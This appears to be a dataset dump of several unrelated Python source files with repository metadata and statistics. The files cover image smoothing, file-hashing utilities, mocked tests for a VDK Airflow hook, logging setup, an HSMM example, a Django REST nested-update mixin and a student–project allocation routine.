def smooth(x, smoothing_scale_arcmin, map_size_arcmin):
"""Smooth by Gaussian kernel."""
# smoothing kernel width in pixels instead of arcmins
map_size_pix = x.shape[0]
s = (smoothing_scale_arcmin * map_size_pix) / map_size_arcmin
# cut off at: 6 sigma + 1 pixel
# for large smooothing area and odd pixel number
cutoff = 6 * int(s+1) + 1
return cv2.GaussianBlur(x, ksize=(cutoff, cutoff), sigmaX=s, sigmaY=s)
| 37.179688
| 87
| 0.604434
| 1,433
| 9,518
| 3.796232
| 0.18702
| 0.023162
| 0.020588
| 0.039706
| 0.332537
| 0.309007
| 0.281066
| 0.263603
| 0.252206
| 0.225
| 0
| 0.014335
| 0.267073
| 9,518
| 255
| 88
| 37.32549
| 0.765482
| 0.165161
| 0
| 0.152439
| 0
| 0
| 0.090136
| 0.021375
| 0
| 0
| 0
| 0
| 0.018293
| 1
| 0.091463
| false
| 0
| 0.02439
| 0
| 0.207317
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
1
| 0
|
f1e232b6730dde2945dc690b0f6fddabcc0f6b8b
| 4,683
|
py
|
Python
|
bert/utils/common.py
|
rschoon/bert
|
5aeb394dd7c1fcf5995d2f7cd6a25ef3ac81ce13
|
[
"MIT"
] | null | null | null |
bert/utils/common.py
|
rschoon/bert
|
5aeb394dd7c1fcf5995d2f7cd6a25ef3ac81ce13
|
[
"MIT"
] | null | null | null |
bert/utils/common.py
|
rschoon/bert
|
5aeb394dd7c1fcf5995d2f7cd6a25ef3ac81ce13
|
[
"MIT"
] | null | null | null |
import hashlib
import io
import json
import os
import re
import struct
def decode_bin(s, encoding=None):
if encoding is None:
encoding = "utf-8"
if encoding in ("bin", "binary", "bytes", "raw"):
return s
return s.decode(encoding)
class open_output(object):
def __init__(self, filename, mode="wb"):
self._dirname = os.path.dirname(filename)
self.filename = str(filename)
self._tmpname = self.filename+".tmp"
self.mode = mode
self._fileobj = None
def __enter__(self):
if self._dirname:
os.makedirs(self._dirname, exist_ok=True)
self._fileobj = open(self._tmpname, self.mode)
return self._fileobj
def __exit__(self, type, value, tb):
self.close(value is None)
def close(self, commit=True):
if self._fileobj is not None:
self._fileobj.close()
if commit:
os.rename(self._tmpname, self.filename)
else:
os.unlink(self._tmpname)
self._fileobj = None
def expect_file_mode(mode, _sub_mode_re=re.compile('^(u|g|o)=([rwx]+)$')):
if mode is None or mode == "":
return None
if isinstance(mode, int):
return mode
modes = mode.split(",")
rv = 0
for sm in modes:
m = _sub_mode_re.match(sm)
if not m:
raise ValueError('Invalud mode value %s in %s' % (sm, mode))
shift = ("o", "g", "u").index(m.group(1))*3
bits = 0
for bi in m.group(2):
bits |= 2**('x', 'w', 'r').index(bi)
rv |= (bits << shift)
return rv
def json_hash(name, value):
h = hashlib.new(name)
h.update(json.dumps(value, sort_keys=True).encode('utf-8'))
return h.hexdigest()
def _file_hash(name, filename, chunk_size=2**16):
h = hashlib.new(name)
sz = 0
with open(filename, "rb") as f:
while True:
chunk = f.read()
if not chunk:
break
sz += len(chunk)
h.update(chunk)
return h, sz
def file_hash(name, filename):
filename = os.fspath(filename)
if os.path.isfile(filename):
h, _ = _file_hash(name, filename)
return h.hexdigest()
h = hashlib.new(name)
dirs = [filename]
while dirs:
dirs = sorted(dirs)
dirname = dirs.pop()
for n in os.listdir(dirname):
fn = os.path.join(dirname, n)
if os.path.isdir(fn):
dirs.append(fn)
else:
fn_u8 = fn.encode('utf-8')
h.update(struct.pack('L', len(fn_u8)))
h.update(fn_u8)
hf, sf = _file_hash(name, fn)
h.update(struct.pack('Q', sf))
h.update(hf.digest())
return h.hexdigest()
def value_hash(name, value):
h = hashlib.new(name)
if isinstance(value, str):
value = value.encode('utf-8')
h.update(value)
return h.hexdigest()
class IOHashWriter(io.IOBase):
def __init__(self, hash_name, fileobj):
if not fileobj.writable():
raise ValueError("IOHashWriter requires writable fileobj")
self._h = hashlib.new(hash_name)
self._inner = fileobj
def digest(self):
return self._h.digest()
def hexdigest(self):
return self._h.hexdigest()
@property
def closed(self):
return self._inner.closed
def close(self):
pass
def fileno(self):
return self._inner.fileno()
def seek(self):
raise OSError("Not seekable")
def seekable(self):
return False
def tell(self):
return self._inner.tell()
def readable(self):
return False
def truncate(self, size=None):
raise OSError("Not truncatable")
def writable(self):
return self._inner.writable()
def write(self, b):
self._h.update(b)
return self._inner.write(b)
class TeeBytesWriter(io.RawIOBase):
def __init__(self, *fileobjs):
self.fileobjs = fileobjs
self.offset = 0
def readable(self):
return False
def tell(self):
return self.offset
def write(self, b):
self.offset += len(b)
for f in self.fileobjs:
f.write(b)
class IOFromIterable(io.RawIOBase):
def __init__(self, iterable):
self._iter = iter(iterable)
self._pos = 0
def readinto(self, buf):
try:
chunk = next(self._iter)
except StopIteration:
return 0
sz = len(chunk)
buf[:sz] = chunk
self._pos += sz
return sz
def tell(self):
return self._pos
| 23.771574
| 74
| 0.558189
| 599
| 4,683
| 4.230384
| 0.263773
| 0.04341
| 0.044199
| 0.023678
| 0.136938
| 0.066298
| 0.050513
| 0.028414
| 0
| 0
| 0
| 0.006283
| 0.320308
| 4,683
| 196
| 75
| 23.892857
| 0.789821
| 0
| 0
| 0.143791
| 0
| 0
| 0.035028
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.196078
| false
| 0.006536
| 0.039216
| 0.071895
| 0.424837
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
1
| 0
|
f1e338fa1474985107d12ea6bcd66b88abed94fc
| 2,924
|
py
|
Python
|
projects/vdk-plugins/airflow-provider-vdk/tests/hooks/test_vdkhook.py
|
vmware/versatile-data-kit
|
c4e10324a4f3203c58079cb18203880f68053f15
|
[
"Apache-2.0"
] | 100
|
2021-10-04T09:32:04.000Z
|
2022-03-30T11:23:53.000Z
|
projects/vdk-plugins/airflow-provider-vdk/tests/hooks/test_vdkhook.py
|
vmware/versatile-data-kit
|
c4e10324a4f3203c58079cb18203880f68053f15
|
[
"Apache-2.0"
] | 208
|
2021-10-04T16:56:40.000Z
|
2022-03-31T10:41:44.000Z
|
projects/vdk-plugins/airflow-provider-vdk/tests/hooks/test_vdkhook.py
|
vmware/versatile-data-kit
|
c4e10324a4f3203c58079cb18203880f68053f15
|
[
"Apache-2.0"
] | 14
|
2021-10-11T14:15:13.000Z
|
2022-03-11T13:39:17.000Z
|
# Copyright 2021 VMware, Inc.
# SPDX-License-Identifier: Apache-2.0
import logging
import unittest
from unittest import mock
from vdk.plugin.control_api_auth.authentication import Authentication
from vdk_provider.hooks.vdk import VDKHook
log = logging.getLogger(__name__)
# Monkey-patch the authentication logic to allow for more granular testing
# of the VDKHook
class PatchedAuth(Authentication):
def read_access_token(self) -> str:
return "test1token"
class TestVDKHook(unittest.TestCase):
@mock.patch.dict(
"os.environ", AIRFLOW_CONN_CONN_VDK="http://https%3A%2F%2Fwww.vdk-endpoint.org"
)
def setUp(self):
self.hook = VDKHook(
conn_id="conn_vdk",
job_name="test_job",
team_name="test_team",
auth=PatchedAuth(),
)
@mock.patch("taurus_datajob_api.api_client.ApiClient.call_api")
def test_start_job_execution(self, mock_call_api):
mock_call_api.return_value = (None, None, {"Location": "job-execution-id-01"})
self.hook.start_job_execution()
assert (
mock_call_api.call_args_list[0][0][0]
== "/data-jobs/for-team/{team_name}/jobs/{job_name}/deployments/{deployment_id}/executions"
and mock_call_api.call_args_list[0][0][1] == "POST"
and mock_call_api.call_args_list[0][0][2]
== {
"team_name": "test_team",
"job_name": "test_job",
"deployment_id": "production",
}
)
@mock.patch("taurus_datajob_api.api_client.ApiClient.request")
def test_cancel_job_execution(self, mocked_api_client_request):
request_url = "https://www.vdk-endpoint.org/data-jobs/for-team/test_team/jobs/test_job/executions/test_execution_id"
self.hook.cancel_job_execution("test_execution_id")
assert mocked_api_client_request.call_args_list[0][0] == ("DELETE", request_url)
@mock.patch("taurus_datajob_api.api_client.ApiClient.deserialize")
@mock.patch("taurus_datajob_api.api_client.ApiClient.request")
def test_get_job_execution_status(self, mocked_api_client_request, _):
request_url = "https://www.vdk-endpoint.org/data-jobs/for-team/test_team/jobs/test_job/executions/test_execution_id"
self.hook.get_job_execution_status("test_execution_id")
assert mocked_api_client_request.call_args_list[0][0] == ("GET", request_url)
@mock.patch("taurus_datajob_api.api_client.ApiClient.deserialize")
@mock.patch("taurus_datajob_api.api_client.ApiClient.request")
def test_get_job_execution_log(self, mocked_api_client_request, _):
request_url = "https://www.vdk-endpoint.org/data-jobs/for-team/test_team/jobs/test_job/executions/test_execution_id/logs"
self.hook.get_job_execution_log("test_execution_id")
assert mocked_api_client_request.call_args_list[0][0] == ("GET", request_url)
| 38.986667
| 129
| 0.703146
| 398
| 2,924
| 4.824121
| 0.253769
| 0.05625
| 0.046875
| 0.06875
| 0.544271
| 0.524479
| 0.524479
| 0.524479
| 0.489063
| 0.459896
| 0
| 0.011227
| 0.177497
| 2,924
| 74
| 130
| 39.513514
| 0.78711
| 0.051642
| 0
| 0.173077
| 0
| 0.057692
| 0.332009
| 0.136199
| 0
| 0
| 0
| 0
| 0.076923
| 1
| 0.115385
| false
| 0
| 0.096154
| 0.019231
| 0.269231
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
1
| 0
|
f1e3adf84f989f48fb009dcc9e422f44d758219c
| 720
|
py
|
Python
|
skater/util/logger.py
|
RPUTHUMA/Skater
|
317460b88065b41eebe6790e9efdbb0595cbe450
|
[
"UPL-1.0"
] | 718
|
2017-05-19T22:49:40.000Z
|
2019-03-27T06:40:54.000Z
|
skater/util/logger.py
|
quant1729/Skater
|
b46a4abe3465ddc7b19ffc762ad45d1414b060a6
|
[
"UPL-1.0"
] | 114
|
2017-05-24T16:55:59.000Z
|
2019-03-27T12:48:18.000Z
|
skater/util/logger.py
|
quant1729/Skater
|
b46a4abe3465ddc7b19ffc762ad45d1414b060a6
|
[
"UPL-1.0"
] | 121
|
2017-05-22T17:20:19.000Z
|
2019-03-21T15:06:19.000Z
|
"""Funcs for logging"""
import logging
_CRITICAL = logging.CRITICAL
_ERROR = logging.ERROR
_WARNING = logging.WARNING
_INFO = logging.INFO
_DEBUG = logging.DEBUG
_NOTSET = logging.NOTSET
def build_logger(log_level, logger_name, capture_warning=True):
logger = logging.Logger(logger_name)
# All warnings are logged by default
logging.captureWarnings(capture_warning)
logger.setLevel(log_level)
msg_formatter = logging.Formatter(
'%(asctime)s - %(name)s - %(levelname)s - %(message)s'
)
stream_handler = logging.StreamHandler()
stream_handler.setFormatter(msg_formatter)
stream_handler.setFormatter(msg_formatter)
logger.addHandler(stream_handler)
return logger
| 24
| 63
| 0.740278
| 84
| 720
| 6.107143
| 0.452381
| 0.101365
| 0.097466
| 0.109162
| 0.14425
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.163889
| 720
| 29
| 64
| 24.827586
| 0.852159
| 0.073611
| 0
| 0.105263
| 0
| 0
| 0.078669
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.052632
| false
| 0
| 0.052632
| 0
| 0.157895
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
1
| 0
|
f1e6fe5da799ee54688ff5ee8d7c10fc529546e8
| 1,818
|
py
|
Python
|
examples/hsmm-geo.py
|
bikash/pyhsmm
|
94fab0ea66072a639b20163c40db04c18069496c
|
[
"MIT"
] | 1
|
2015-11-08T05:20:39.000Z
|
2015-11-08T05:20:39.000Z
|
examples/hsmm-geo.py
|
bikash/pyhsmm
|
94fab0ea66072a639b20163c40db04c18069496c
|
[
"MIT"
] | null | null | null |
examples/hsmm-geo.py
|
bikash/pyhsmm
|
94fab0ea66072a639b20163c40db04c18069496c
|
[
"MIT"
] | null | null | null |
from __future__ import division
import numpy as np
np.seterr(divide='ignore') # these warnings are usually harmless for this code
from matplotlib import pyplot as plt
import copy, os
import pyhsmm
from pyhsmm.util.text import progprint_xrange
###################
# generate data #
###################
T = 1000
obs_dim = 2
N = 4
obs_hypparams = {'mu_0':np.zeros(obs_dim),
'sigma_0':np.eye(obs_dim),
'kappa_0':0.25,
'nu_0':obs_dim+2}
dur_hypparams = {'alpha_0':10*1,
'beta_0':10*100}
true_obs_distns = [pyhsmm.distributions.Gaussian(**obs_hypparams)
for state in range(N)]
true_dur_distns = [pyhsmm.distributions.GeometricDuration(**dur_hypparams)
for state in range(N)]
truemodel = pyhsmm.models.GeoHSMM(
alpha=6.,
init_state_concentration=6.,
obs_distns=true_obs_distns,
dur_distns=true_dur_distns)
data, labels = truemodel.generate(T)
plt.figure()
truemodel.plot()
temp = np.concatenate(((0,),truemodel.states_list[0].durations.cumsum()))
changepoints = zip(temp[:-1],temp[1:])
changepoints[-1] = (changepoints[-1][0],T) # because last duration might be censored
#########################
# posterior inference #
#########################
Nmax = 25
obs_distns = [pyhsmm.distributions.Gaussian(**obs_hypparams) for state in range(Nmax)]
dur_distns = [pyhsmm.distributions.GeometricDuration(**dur_hypparams) for state in range(Nmax)]
posteriormodel = pyhsmm.models.GeoHSMMPossibleChangepoints(
alpha=6.,
init_state_concentration=6.,
obs_distns=obs_distns,
dur_distns=dur_distns)
posteriormodel.add_data(data,changepoints=changepoints)
for idx in progprint_xrange(50):
posteriormodel.resample_model()
plt.figure()
posteriormodel.plot()
plt.show()
| 25.25
| 95
| 0.669417
| 230
| 1,818
| 5.095652
| 0.408696
| 0.046075
| 0.085324
| 0.064846
| 0.303754
| 0.303754
| 0.295222
| 0.295222
| 0.230375
| 0.230375
| 0
| 0.025914
| 0.172167
| 1,818
| 71
| 96
| 25.605634
| 0.752824
| 0.069857
| 0
| 0.177778
| 0
| 0
| 0.025721
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| false
| 0
| 0.133333
| 0
| 0.133333
| 0.044444
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
1
| 0
|
f1e7704fa789f92ccdaa67ed757a654c38ed5fda
| 2,644
|
py
|
Python
|
drf_nested/mixins/update_nested_mixin.py
|
promoteinternational/drf-nested
|
0042b9e4c100df4ae43a10684c30348160b39187
|
[
"MIT"
] | 1
|
2020-01-05T07:23:48.000Z
|
2020-01-05T07:23:48.000Z
|
drf_nested/mixins/update_nested_mixin.py
|
promoteinternational/drf-nested
|
0042b9e4c100df4ae43a10684c30348160b39187
|
[
"MIT"
] | null | null | null |
drf_nested/mixins/update_nested_mixin.py
|
promoteinternational/drf-nested
|
0042b9e4c100df4ae43a10684c30348160b39187
|
[
"MIT"
] | 2
|
2019-08-12T07:36:57.000Z
|
2019-11-30T01:40:30.000Z
|
from django.db import transaction
from rest_framework.exceptions import ValidationError
from .base_nested_mixin import BaseNestedMixin
class UpdateNestedMixin(BaseNestedMixin):
@transaction.atomic
def update(self, instance, validated_data):
"""
:param instance:
:param validated_data:
:return:
"""
self._errors = {}
if self._has_nested_fields(validated_data):
validated_data, nested_fields_data = self._get_nested_fields(validated_data, remove_fields=True)
nested_field_types = self.extract_nested_types(nested_fields_data)
# Updating or creating direct relations like ForeignKeys before we create initial instance
for field in nested_field_types["direct_relations"]:
field_name = field.get('name')
field_data = field.get('data')
if isinstance(field_data, dict):
nested_instance = self._update_or_create_direct_relations(field_name, field_data)
validated_data[field.get("original_name")] = nested_instance
elif field_data is None:
validated_data[field.get("original_name")] = field_data
model_instance = super().update(instance, validated_data)
# Updating or creating reversed relations like the models that have the current model as ForeignKeys
# using created initial instance
for field in nested_field_types["reverse_relations"]:
field_name = field.get('name')
field_data = field.get('data')
self._update_or_create_reverse_relation(field_name, field_data, model_instance)
# Updating or creating generic relations using created initial instance
for field in nested_field_types["generic_relations"]:
field_name = field.get('name')
field_data = field.get('data')
self._update_or_create_generic_relation(field_name, field_data, model_instance)
# Updating or creating many-to-many relations using created initial instance
for field in nested_field_types["many_to_many_fields"]:
field_name = field.get('name')
field_data = field.get('data')
self._update_or_create_many_to_many_field(field_name, field_data, model_instance)
if self._errors:
raise ValidationError(self._errors)
else:
model_instance = super().update(instance, validated_data)
model_instance.refresh_from_db()
return model_instance
| 44.066667
| 112
| 0.655825
| 298
| 2,644
| 5.489933
| 0.244966
| 0.071516
| 0.071516
| 0.056235
| 0.496333
| 0.469438
| 0.410147
| 0.355134
| 0.330073
| 0.330073
| 0
| 0
| 0.274962
| 2,644
| 59
| 113
| 44.813559
| 0.853417
| 0.156203
| 0
| 0.27027
| 0
| 0
| 0.05807
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.027027
| false
| 0
| 0.081081
| 0
| 0.162162
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
1
| 0
|
f1ee53bc0c6e33469f0d38aac5f3576590fc8660
| 14,142
|
py
|
Python
|
allocate.py
|
tomdavsmi/ncl-spa
|
baa714071d18cc388ccc73702d78a53f7096db6e
|
[
"MIT"
] | null | null | null |
allocate.py
|
tomdavsmi/ncl-spa
|
baa714071d18cc388ccc73702d78a53f7096db6e
|
[
"MIT"
] | null | null | null |
allocate.py
|
tomdavsmi/ncl-spa
|
baa714071d18cc388ccc73702d78a53f7096db6e
|
[
"MIT"
] | null | null | null |
import library
import random
import re
def allocate(studPrefs,unassignedStudents,lecturerprefs,projLects,lectProjs,lecturercaps,projCaps,randomise,updates,iterationLimit):
# Create projected preference list - first pass; add students not on lecturer's list
for k, v in studPrefs.items():
for project in v:
idx = library.firstidx(lecturerprefs[projLects[project]],k)
if idx == -1:
lecturerprefs[projLects[project]].append(k)
projectedPrefs = {}
# Create projected preference list - second pass; add students to projected list
for k, v in projLects.items():
for student in lecturerprefs[v]:
if library.firstidx(studPrefs[student], k) > -1:
if k not in projectedPrefs:
projectedPrefs.update({k: []})
projectedPrefs[k].append(student)
else:
projectedPrefs[k].append(student)
maxidx = 0
done = 0
iters = 0
projAssignments = dict()
lectAssignments = dict()
studAssignments = dict()
nProj = 0
currentStudent = ""
while done != 1:
iters += 1
if randomise == 1:
random.shuffle(unassignedStudents)
if iters > iterationLimit & iterationLimit != -1:
print("Maximum number of iterations "+str(iterationLimit)+" before convergence")
done = 1
if len(unassignedStudents) > 0:
for value in unassignedStudents:
currentStudent = value
nProj = len(studPrefs[currentStudent])
if nProj > 0:
break
if nProj > 0: ### We have a student who still has projects in their list - heart of the alogrithm
currentProject = studPrefs[currentStudent][0]
currentLecturer = projLects[currentProject]
if currentProject not in projAssignments:
projAssignments.update({currentProject:[]})
projAssignments[currentProject].append(currentStudent)
else:
projAssignments[currentProject].append(currentStudent)
if currentLecturer not in lectAssignments:
lectAssignments.update({currentLecturer:[]})
lectAssignments[currentLecturer].append(currentStudent)
else:
lectAssignments[currentLecturer].append(currentStudent)
studAssignments.update({currentStudent:currentProject})
idx = library.firstidx(unassignedStudents,currentStudent)
unassignedStudents.pop(idx)
if updates == True:
print(str(iters)+" : Assigned "+currentStudent+" to project "+currentProject+" with supervisor "+currentLecturer+"\n")
#Is the project the student was just assigned to overloaded?
if len(projAssignments[currentProject]) > int(projCaps[currentProject]):
maxidx = -1
for value in projAssignments[currentProject]:
idx = library.firstidx(projectedPrefs[currentProject], value)
if idx == -1:
maxidx = idx
worst = value
break
if idx > maxidx:
maxidx = idx
worst = value
if updates == True:
print("Project " + currentProject + " is overloaded. Removing " + worst + ".\n")
idx = library.firstidx(lectAssignments[currentLecturer],worst)
lectAssignments[currentLecturer].pop(idx)
idx = library.firstidx(projAssignments[currentProject],worst)
projAssignments[currentProject].pop(idx)
if worst not in unassignedStudents:
unassignedStudents.append(worst)
if worst in studAssignments:
studAssignments.pop(worst)
#Is the lecturer of the project the student was just assigned to overloaded?
if len(lectAssignments[currentLecturer]) > int(lecturercaps[currentLecturer]):
maxidx = -1
for value in lectAssignments[currentLecturer]:
idx = library.firstidx(lecturerprefs[currentLecturer],value)
if idx == -1:
maxidx = idx
worst = value
break
if idx > maxidx:
maxidx = idx
worst = value
if updates == True:
print("Lecturer " + currentLecturer + " is overloaded. Removing " + worst + ".\n")
idx = library.firstidx(lectAssignments[currentLecturer], worst)
lectAssignments[currentLecturer].pop(idx)
if worst in studAssignments:
idx = library.firstidx(projAssignments[studAssignments[worst]], worst)
projAssignments[studAssignments[worst]].pop(idx)
if worst not in unassignedStudents:
unassignedStudents.append(worst)
if worst in studAssignments:
studAssignments.pop(worst)
#Is the project full?
if len(projAssignments[currentProject]) == int(projCaps[currentProject]):
maxidx = -1
for value in projAssignments[currentProject]:
idx = library.firstidx(projectedPrefs[currentProject], value)
if idx == -1:
maxidx = idx
worst = value
break
if idx > maxidx:
maxidx = idx
worst = value
if updates == True:
print("Project "+currentProject+" is full: removing successors to "+worst)
idx = library.firstidx(projectedPrefs[currentProject],worst)
a = []
if idx == -1 or idx == len(projectedPrefs[currentProject])-1:
pass
else:
for i in range(idx+1,len(projectedPrefs[currentProject])):
a.append(projectedPrefs[currentProject][i])
for i in a:
while True:
idx = library.firstidx(studPrefs[i],currentProject)
if idx > -1:
studPrefs[i].pop(idx)
if idx == -1:
break
#Is the lecturer full?
if len(lectAssignments[currentLecturer]) == int(lecturercaps[currentLecturer]):
maxidx = -1
for value in lectAssignments[currentLecturer]:
idx = library.firstidx(lecturerprefs[currentLecturer], value)
if idx == -1:
maxidx = idx
worst = value
break
if idx > maxidx:
maxidx = idx
worst = value
if updates == True:
print("Lecturer "+currentLecturer+" is full: removing successors to "+worst+"\n")
idx = library.firstidx(lecturerprefs[currentLecturer],worst)
a = []
if idx == -1 or idx == len(lecturerprefs[currentLecturer])-1:
pass
else:
for i in range(idx+1,len(lecturerprefs[currentLecturer])):
a.append(lecturerprefs[currentLecturer][i])
for i in a:
for project in lectProjs[currentLecturer]:
while True:
idx = library.firstidx(projectedPrefs[project], i)
if idx > -1:
projectedPrefs[project].pop(idx)
if idx == -1:
break
while True:
idx = library.firstidx(studPrefs[i],project)
if idx > -1:
studPrefs[i].pop(idx)
if idx == -1:
break
if updates == True:
print(str(iters)+": Remaining students:" + str(unassignedStudents)+"\n-------------\n")
else:
done= 1
else:
done= 1
return {"Student Assignments":studAssignments, "Lecturer Assignments": lectAssignments, "Project Assignments": projAssignments, "Unassigned Students": unassignedStudents}
def random_distribute(unassignedStudents,studAssignments,projAssignments,projCaps,lectAssignments,lecturercaps, lectProjs, projLects, updates):
freeprojects = []
unassignedStudentsCopy = unassignedStudents
freeprojects = library.findFreeProjects(projAssignments, projCaps, lectAssignments, lecturercaps, lectProjs)
if updates == True:
print("***Distributing remaining "+str(len(unassignedStudents))+" students***\n")
if updates == True and len(unassignedStudents) <= len(freeprojects):
print(str(
len(freeprojects)) + " projects are available. All remaining students will be randomly allocated a project\n")
elif updates == True and len(freeprojects) < len(unassignedStudents):
diff = len(unassignedStudents) - len(freeprojects)
print(
str(len(freeprojects)) + " projects are available. " + str(diff) + " students will not be assigned to projects\n")
for student in unassignedStudentsCopy:
if len(freeprojects) > 0:
thisproject = random.choice(freeprojects)
thislecturer = projLects[thisproject]
if thisproject not in projAssignments:
projAssignments.update({thisproject: []})
projAssignments[thisproject].append(student)
else:
projAssignments[thisproject].append(student)
if thislecturer not in lectAssignments:
lectAssignments.update({thislecturer: []})
lectAssignments[thislecturer].append(student)
else:
lectAssignments[thislecturer].append(student)
if updates:
print("Student "+student+" has been allocated to project "+thisproject+" with lecturer "+thislecturer)
studAssignments.update({student:thisproject})
freeprojects.pop(0)
for student in studAssignments:
if student in unassignedStudents:
unassignedStudents.remove(student)
return{"Student Assignments": studAssignments, "Lecturer Assignments":lectAssignments, "Project Assignments":projAssignments, "Unassigned Students": unassignedStudents}
def topic_distribute(unassignedStudents,studTopicPrefs,studAssignments,projAssignments,projCaps,lectAssignments,lecturercaps, projLects, lectProjs, updates):
freeprojects = []
unassignedStudentsCopy = unassignedStudents
freeprojects = library.findFreeProjects(projAssignments, projCaps, lectAssignments, lecturercaps, lectProjs)
if updates == True:
print("***Distributing remaining " + str(len(unassignedStudents)) + " students***\n")
elif updates == True and len(freeprojects) < len(unassignedStudents):
diff = len(unassignedStudents) - len(freeprojects)
print(
str(len(
freeprojects)) + " projects are available. " + diff + " students will not be assigned to projects\n")
inorgfree = []
orgfree = []
medfree = []
physfree = []
for project in freeprojects:
if re.match("I[A-Z][0-9][0-9]", project) is not None:
inorgfree.append(project)
if re.match("O[A-Z][0-9][0-9]", project) is not None:
orgfree.append(project)
if re.match("P[A-Z][0-9][0-9]", project) is not None:
physfree.append(project)
if re.match("M[A-Z][0-9][0-9]", project) is not None:
medfree.append(project)
for student in unassignedStudentsCopy:
print("Assigning student "+student)
if len(freeprojects) > 0:
print("There are "+str(len(freeprojects))+" projects remaining")
for topic in studTopicPrefs[student]:
print("Currently looking for an "+topic+" project")
if topic == "I" and len(inorgfree) > 0:
print("Found I")
thisproject = random.choice(inorgfree)
thislecturer = projLects[thisproject]
if thisproject not in projAssignments:
projAssignments.update({thisproject: []})
projAssignments[thisproject].append(student)
else:
projAssignments[thisproject].append(student)
if thislecturer not in lectAssignments:
lectAssignments.update({thislecturer: []})
lectAssignments[thislecturer].append(student)
else:
lectAssignments[thislecturer].append(student)
studAssignments.update({student: thisproject})
freeprojects.remove(thisproject)
inorgfree.remove(thisproject)
#unassignedStudents.remove(student)
if updates:
print("Allocated "+student+" to project "+thisproject+" with lecturer "+ thislecturer+"\n")
break
if topic == "O" and len(orgfree) > 0:
print("Found O")
thisproject = random.choice(orgfree)
thislecturer = projLects[thisproject]
if thisproject not in projAssignments:
projAssignments.update({thisproject: []})
projAssignments[thisproject].append(student)
else:
projAssignments[thisproject].append(student)
if thislecturer not in lectAssignments:
lectAssignments.update({thislecturer: []})
lectAssignments[thislecturer].append(student)
else:
lectAssignments[thislecturer].append(student)
studAssignments.update({student: thisproject})
freeprojects.remove(thisproject)
orgfree.remove(thisproject)
#unassignedStudents.remove(student)
if updates:
print(
"Allocated " + student + " to project " + thisproject + " with lecturer " + thislecturer + "\n")
break
if topic == "P" and len(physfree) > 0:
print("Found P")
thisproject = random.choice(physfree)
thislecturer = projLects[thisproject]
if thisproject not in projAssignments:
projAssignments.update({thisproject: []})
projAssignments[thisproject].append(student)
else:
projAssignments[thisproject].append(student)
if thislecturer not in lectAssignments:
lectAssignments.update({thislecturer: []})
lectAssignments[thislecturer].append(student)
else:
lectAssignments[thislecturer].append(student)
studAssignments.update({student: thisproject})
freeprojects.remove(thisproject)
physfree.remove(thisproject)
#unassignedStudents.remove(student)
if updates:
print(
"Allocated " + student + " to project " + thisproject + " with lecturer " + thislecturer + "\n")
break
if topic == "M" and len(medfree) > 0:
print("Found M")
thisproject = random.choice(medfree)
thislecturer = projLects[thisproject]
if thisproject not in projAssignments:
projAssignments.update({thisproject: []})
projAssignments[thisproject].append(student)
else:
projAssignments[thisproject].append(student)
if thislecturer not in lectAssignments:
lectAssignments.update({thislecturer: []})
lectAssignments[thislecturer].append(student)
else:
lectAssignments[thislecturer].append(student)
studAssignments.update({student: thisproject})
freeprojects.remove(thisproject)
medfree.remove(thisproject)
#unassignedStudents.remove(student)
if updates:
print(
"Allocated " + student + " to project " + thisproject + " with lecturer " + thislecturer + "\n")
break
for student in studAssignments:
if student in unassignedStudents:
unassignedStudents.remove(student)
#random.shuffle(unassignedStudentsCopy)
return{"Student Assignments": studAssignments, "Lecturer Assignments":lectAssignments, "Project Assignments":projAssignments, "Unassigned Students": unassignedStudents}
| 38.53406
| 172
| 0.680031
| 1,398
| 14,142
| 6.877682
| 0.101574
| 0.029745
| 0.028081
| 0.040562
| 0.679563
| 0.627977
| 0.610192
| 0.602496
| 0.598336
| 0.590016
| 0
| 0.005402
| 0.214609
| 14,142
| 367
| 173
| 38.53406
| 0.860268
| 0.04172
| 0
| 0.646875
| 0
| 0
| 0.09171
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.009375
| false
| 0.00625
| 0.009375
| 0
| 0.021875
| 0.075
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
1
| 0
|
f1f2709a9b0d54f4549f4f5b2c964cce095a32f9
| 3,655
|
py
|
